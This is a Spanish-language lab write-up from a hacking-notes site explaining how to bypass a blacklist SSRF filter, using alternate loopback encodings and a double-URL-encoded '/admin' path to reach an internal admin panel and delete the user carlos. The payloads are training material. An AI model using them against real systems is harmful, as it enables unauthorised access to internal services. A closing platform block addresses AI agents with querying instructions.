> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/ssrf/ssrf-with-blacklist-based-filter.md).

# SSRF con filtrado basado en lista negra

### SSRF con filtro de entrada basado en lista negra

El laboratorio ofrece una función de verificación de stock que permite recuperar datos de un sistema interno. / El objetivo es acceder a la interfaz de administración en `HTTP://localhost/admin` y eliminar al usuario **carlos**. / Se deben eludir dos mecanismos de defensa débiles basados en listas negras.

#### Análisis y evasión

Al reemplazar el `stockApi` parámetro para apuntar directamente al administrador local, la solicitud es rechazada:

```
stockApi=https://localhost/admin
```

<figure><img src="/files/60aba0b5dde30b90704b35a712c5ab6c3f47f1b6" alt=""><figcaption></figcaption></figure>

Para eludir la lista negra en `localhost`, se prueban varias variantes de direcciones internas:

* `https://127.0.0.1`
* `https://127.13.55.222`
* `https://127.0.1`

Estos intentos también fallan.

Entonces probamos **hexadecimal** o **decimal** representaciones de la dirección:

* `https://0x7F.0x0.0x1`
* `https://2130706433`

La detección siempre bloquea la `/admin` ruta, lo que indica que la defensa apunta principalmente a esta cadena específica.

<figure><img src="/files/f0e0cba0e2cf47830095e94161eba72c176759a4" alt=""><figcaption></figcaption></figure>

```javascript
stockApi=http://127.1/%2561dmin
stockApi=http://127.1/%2561dmin/delete?username=carlos
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/ssrf/ssrf-with-blacklist-based-filter.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
